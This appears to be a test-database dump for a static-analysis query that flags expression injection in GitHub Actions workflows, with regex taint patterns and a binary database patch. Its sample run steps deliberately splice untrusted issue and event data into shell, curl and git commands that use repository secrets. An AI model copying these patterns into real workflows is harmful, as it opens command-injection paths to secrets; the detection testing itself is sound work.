_reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9
_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: 
step0octo-org/this-repo/.github/workflows/workflow.ymltaintocto-org/summary-repo/.github/workflows/workflow.ymlakhileshns/heroku-deployinput.branchoutput.statusandroid-actions/setup-androidinput.cmdline-tools-versionoutput.ANDROID_COMMANDLINE_TOOLS_VERSIONapple-actions/import-codesign-certsinput.keychain-passwordoutput.keychain-passwordashley-taylor/read-json-property-actioninput.jsonoutput.valueashley-taylor/regex-property-actioninput.replacementinput.valueaszc/change-string-case-actioninput.stringoutput.capitalizedinput.replace-withoutput.uppercaseoutput.lowercaseaws-actions/configure-aws-credentialsinput.aws-access-key-idenv.AWS_ACCESS_KEY_IDsecret.AWS_ACCESS_KEY_IDinput.aws-secret-access-keyenv.AWS_SECRET_ACCESS_KEYsecret.AWS_SECRET_ACCESS_KEYinput.aws-session-tokenenv.AWS_SESSION_TOKENsecret.AWS_SESSION_TOKENbobheadxi/deploymentsinput.envoutput.envbufbuild/buf-breaking-actioninput.buf_tokenenv.BUF_TOKENbufbuild/buf-lint-actioncachix/cachix-actioninput.signingKeyenv.CACHIX_SIGNING_KEYcoursier/cache-actioninput.pathenv.COURSIER_CACHEcrazy-max/ghaction-import-gpginput.fingerprintoutput.fingerprintcsexton/release-asset-actioninput.release-urloutput.urldelaguardo/setup-clojureinput.bootenv.BOOT_VERSIONoutput.replacedgame-ci/unity-test-runnerinput.artifactsPathoutput.artifactsPathgetsentry/action-releaseinput.versionoutput.versioninput.version_prefixgithub/codeql-actioninput.outputoutput.sarif-outputgradle/gradle-build-actioninput.cache-encryption-keyenv.GRADLE_ENCRYPTION_KEYinput.build-scan-terms-of-service-agreeenv.BUILD_SCAN_TERMS_OF_SERVICE_AGREEinput.build-scan-terms-of-service-urlenv.BUILD_SCAN_TERMS_OF_SERVICE_URLhaya14busa/action-condinput.if_trueinput.if_falsehexlet/project-actioninput.mount-pathenv.PWDjsdaniell/create-jsoninput.nameoutput.successfullyinput.dirjwalton/gh-ecr-pushinput.imageoutput.imageUrllarsoner/circleci-artifacts-redirector-actioninput.artifact-pathinput.sourceinput.replacemattdavis0351/actionsinput.image-nameinput.tagmetro-digital/setup-t
ools-for-waasinput.gcp_sa_keyenv.GCLOUD_PROJECTmishakav/pytest-coverage-commentinput.multiple-filesoutput.summaryReportmymindstorm/setup-emsdkinput.actions-cache-folderenv.EMSDKruby/setup-rubyinput.ruby-versionoutput.ruby-prefixsalsify/action-detect-and-tag-new-versioninput.tag-templateoutput.tagshallwefootball/upload-s3-actioninput.destination_diroutput.object_keyshogo82148/actions-setup-perlinput.working-directoryenv.PERL5LIBsuisei-cn/actions-download-fileinput.filenameoutput.filenametimheuer/base64-to-fileinput.fileNameoutput.filePathinput.fileDirbranchcmdline-tools-versionkeychain-passwordjsonreplacementaws-access-key-idaws-secret-access-keyaws-session-tokenbuf_tokensigningKeyfingerprintrelease-urlbootartifactsPathversionversion_prefixoutputcache-encryption-keybuild-scan-terms-of-service-agreebuild-scan-terms-of-service-urlif_trueif_falsemount-pathdirartifact-pathimage-nametaggcp_sa_keymultiple-filesactions-cache-folderruby-versiontag-templatedestination_dirworking-directoryfilenamefileNamefileDir +echo "Bad Issue Title Format"exit 1echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labelsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labelscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} 
${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentsecho urldecode ${{env.issue_label}}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/commentsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENVecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENVecho "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENVgh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }}gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENVgit config user.name "${{env.user_name}}"git fetch --allgit checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}git cherry-pick -x ${{github.event.after}} --strategy-option theirsgit push -u origin ${{env.auto_branch}}hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"echo "::set-output name=initial_url::$BODY"echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUTecho "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT"Write-Output "::set-output 
name=MSG::$ENV{BODY}".*::set-output\s+name=(.*)::.*.*echo\s*"(.*)=.*\s*>>\s*(")?\$GITHUB_OUTPUT.*$BODY$MSG$INITIAL_URL$REDIRECTED_URL${BODY${MSG${INITIAL_URL${REDIRECTED_URL$ENV{BODY$ENV{MSG$ENV{INITIAL_URL$ENV{REDIRECTED_URLoutput.foooutput.all_changed_files_countjob_output]test]matrix]MSG]value]replaced]initial_url]redirected_url]trimmed_url][job_output][matrix][MSG][value][replaced][initial_url][redirected_url][trimmed_url] [job_output] [test] [matrix] [MSG] [value] [replaced] [initial_url] [redirected_url] [trimmed_url]Uses Step: remove_quotations [replaced]Run Step: extract-url [initial_url]Run Step: curl [redirected_url]Run Step: trim-url [trimmed_url]Job outputs node [job_output]Uses Step: step [value]Job outputs node [matrix]Uses Step: summary [value]Uses Step: step0 [value]Run Step: step1 [MSG]Run Step: step2 [test]semmle.labelPotential expression injection, which may be controlled by an external user. \ No newline at end of file 
diff --git a/db/db-yaml/default/yaml.rel b/db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..68a7a887f651d38ec0cd273155e841acc2d28904 GIT binary patch literal 33384 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 
